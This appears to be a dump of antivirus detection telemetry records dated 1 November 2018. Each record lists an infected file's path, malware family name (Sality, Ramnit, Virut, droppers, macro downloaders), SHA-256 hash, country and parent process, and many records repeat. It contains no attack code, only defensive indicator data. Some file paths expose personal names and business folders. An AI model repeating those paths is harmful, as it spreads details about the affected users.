  Row(detection=Row(filename='avscan-20181101-093944-12d0d6ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_481d6786\\AVSCAN-20181101-090916-1E8EDAEF\\AVSCAN-20181101-093944-12D0D6AB', filesize=13264000, name='ADWARE/CrossRider.Gen.#M1.#R1'), hash='951f99e65efe12bc7a75c28025707f32dca35ce18ebf8fea558f1fef5f5b1086', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143124-08a6cfbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143124-08A6CFBD', filesize=5620000, name='WORM/Lodbak.Gen4.#M1.#R1'), hash='953564fa4d60dfb5b9b175e1f300ee9ce48928631da591f0f8411695711fb1ac', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9568fff25a80896239b91f314fcd03e096f718c7176ed1877b388ef4b28104b7', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T00:54:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\WASHIN SSS\\SSS2010\\WASHIN  JUNE 2010\\R3.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='95723daca81f3380fad66dd32f8c6ac8c0e57e692f6aaf1cf167c027d2ba655c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:53:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105101-b18d6ff7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2c55942\\AVSCAN-20181101-105041-AF94BD9A\\AVSCAN-20181101-105101-B18D6FF7', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files (x86)\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:27:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='96951364ce27aee23100cc0419db51e4eb67accb932eddea6855279467490c06', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\96951364CE27AEE23100CC0419DB51E4EB67ACCB932EDDEA6855279467490C06', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='96951364ce27aee23100cc0419db51e4eb67accb932eddea6855279467490c06', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rv.exe', filepath='\\\\?\\C:\\Users\\X\\Batch\\RV.exe', filesize=448000, name='PUA/LoadMoney.#M1.#R1'), hash='96ed3c7fa79bc55c24e85d367e8070bede957254753339120605f2356b0dc176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='96f08671316f9e0a3ff2eacb8273a2040f637780957944228323bab549132c9f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:56:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='972b7fe8212580b5cc73ba32dba3da6756e883961eaf11b14f3efba84e257d59.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\972B7FE8212580B5CC73BA32DBA3DA6756E883961EAF11B14F3EFBA84E257D59.VIR', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='972b7fe8212580b5cc73ba32dba3da6756e883961eaf11b14f3efba84e257d59', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:19:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\Wondershare\\Wondershare Helper Compact\\WSHelper.exe', parentsize=2062336, timestamp='2018-11-01T15:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='customer no 492980.doc', filepath='C:\\Users\\X\\Downloads\\Customer No 492980.doc', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T23:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='d:\\al assil\\desktop\\downloads\\Setup.exe', filesize=1340000, name='W32/Sality.AT.#M1.#R1'), hash='977855d866fe610b8ea98b2043d4d16f9a8b2e2c88ecc335ee67d2bf1b7b271b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\program files (x86)\\avira\\antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:12:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='udvderase.exe', filepath='C:\\Program Files\\Corel\\Corel Burn.Now Lenovo Edition\\uDVDErase.exe', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='986d6c6f11f0f835f658d63eccc74011e72327722f30f643be50add31ec82743', metadata=Row(cmdline='invagent.dll,RunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='98a564c51ad69f757410e9afdcdb1eed2a49e2964751168901d24e891267f0bf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reactivated.exe', filepath='C:\\Windows\\reactivated.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='98c238fe7b3be5683a397e4653deb134836d0c820319a9629357208cf80eb10b', metadata=Row(cmdline='\\\\\\/manual \\\\\\/fixskipuac \\\\\\/SkipUac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8214288, timestamp='2018-11-01T01:02:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='990a6632dd4801c8831ff3a0bf6bdc7ceadc00075094e28ce3dfbafa1eb9cf80', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T21:53:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9922e46dae1b6432d9a5474a0631efb2103e210e0d569796c00293a93328bfb0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\9922E46DAE1B6432D9A5474A0631EFB2103E210E0D569796C00293A93328BFB0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9922e46dae1b6432d9a5474a0631efb2103e210e0d569796c00293a93328bfb0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jb09.exe', filepath='F:\\Kerja2\\2015\\PAIM 2015\\New folder\\RTK Johor\\Johor Bahru\\fscommand\\jb09.exe', filesize=14272000, name='HEUR/AGEN.1013731.#M1.#R1'), hash='992996323e93f1c20bfe545716b086c845d109b93b08f3903e98316837e85f79', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T04:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0_5_0_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\0_5_0_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='9936446c153f2989de9b0251c76259e28db1a431f243d3d07bc76d6859a8ccc0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T12:54:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dw20.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE', filesize=880000, name='W32/Sality.AT.#M1.#R1'), hash='999e5a306b24b48622b177c078c18b94e37dddb09a319a2735277cc16db69e49', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tar.exe', filepath='C:\\Users\\X\\Desktop\\JUDGES\\Exes\\tar.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='99d5d3daee62592a20d1e32dd290b9e19e3f7fc1756cb7c484382f033b2aad82', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:52:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tar.exe', filepath='C:\\Users\\X\\Desktop\\JUDGES\\Exes\\tar.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='99d5d3daee62592a20d1e32dd290b9e19e3f7fc1756cb7c484382f033b2aad82', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T07:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T13:39:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T15:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwr_toolbars_tb_08.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_toolbars_tb_08.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9addbc19b6296f9310bcca3c9db0c8729958c1f0b46409718fc15e53ee0bec08', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T09:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003305.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0003305.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:59:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bhome3135.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\soft\\ViRut\\BHome3135.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:57:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0002626.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0002626.EXE', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:58:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003607.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0003607.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:59:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='G:\\phone firmwares\\Lyf_LS5017\\Lyf_LS5017_R012_MT6735_6.0\\Lyf_LS5017_R012_MT6735_6.0\\Lyf_LS5017_R012_MT6735_6.0\\SN Write Tool v2.1504.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='9b1d65b060e0cbbdce7a83ad7d7bf771e9ed744ca12dde08869f65652c1d5540', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:50:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:51:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:56:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:18:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:51:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:51:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:52:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:51:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:51:43Z'), dt=datetime.date(2018, 11, 1)),
